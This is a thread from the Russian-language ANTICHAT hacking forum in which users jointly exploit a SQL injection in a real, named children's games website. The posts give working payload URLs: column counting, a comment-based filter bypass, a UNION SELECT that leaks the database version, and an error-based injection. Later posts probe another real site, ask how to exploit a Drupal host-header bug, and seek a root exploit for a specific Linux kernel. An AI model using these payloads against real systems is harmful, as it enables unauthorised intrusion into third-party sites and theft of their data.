ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.06.2010, 18:50
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
Url уязвим :
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts%27
Query failed - reason1:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Darts'')' at line 1
попробовать много, но я не могу найти SQLI и столбцов
|
|
|
30.06.2010, 21:13
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
2 linuxkernal
если понадобится закомментировать оставшуюся часть запроса, то можно вприницпе так
Код:
Code:
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts')+and+substring(version(),1,1)=5**+
А вот union select вставить не получилось, потому что выдает 403 даже на asdunionasdselectasd |
|
|
|
30.06.2010, 21:16
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=1')+ORDER+BY+22%23
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999')+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22%23
хмм фильтр обошел но незнаю зачем она ругается...
|
|
|
|
30.06.2010, 21:30
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от pinch
pinch said:
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=1')+ORDER+BY+22%23
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999')+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22%23
хмм фильтр обошел но незнаю зачем она ругается...
Смотри внимательно ошибку. * заменяется на -
|
|
|
|
30.06.2010, 21:34
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
Код:
Code:
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999%27%29+and+%27/*%27+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23
хех, видимая)
общими усилиями, так сказать, раскрутили..) |
|
|
|
30.06.2010, 22:20
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Так, предыдущий пост удалил, чтобы было немонго понятней (Сюда закинул только блинку). Вообщем вот она.
http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts')+and+substring(versi on(),1,1)=5+and+1=('1
И все же докрутил как хотел, кому интересно, вот > http://www.jocuripentrucopii.eu/play_game.php?nume_joc=')+or+(select+Count(0),Concat(version(),floor(rand(0)/(1/2)))from(information_schema.columns)GROUP+by+2)=(1 ,'1
|
|
|
|
30.06.2010, 23:58
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Народ помогите разобраться как заюзать багу. Не могу сообразить как надо сформировать запрос. Вот типа патч от этой баги. http://drupal.org/files/sa-2008-067/SA-2008-067-5.11.patch
Я та понял что можно подменить занчение $_SERVER['HTTP_HOST'] , но блин ничего не выходит ;(
|
|
|
|
01.07.2010, 12:08
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094
Репутация:
0
|
|
Сообщение от v1d0qz
v1d0qz said:
Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.
Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.
, значит нет варианта ?
http://oragir.am/news.php?id=13%27a
|
|
|
|
01.07.2010, 16:21
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Посоветуйте рут сплойт для:
Linux *.com 2.6.32.10-90.fc12.i686.PAE #1 SMP Tue Mar 23 10:04:28 UTC 2010 i686
Что-то подходящего не нашел
|
|
|
|
01.07.2010, 18:55
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от IMMORTAL_S
IMMORTAL_S said:
Посоветуйте рут сплойт для:
Linux *.com 2.6.32.10-90.fc12.i686.PAE #1 SMP Tue Mar 23 10:04:28 UTC 2010 i686
Что-то подходящего не нашел
Дату смотри. Сам то как думаешь, есть ли такие вещи в паблике? )
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2231370){kind=avatar}
Похожие темы
Линейный вид
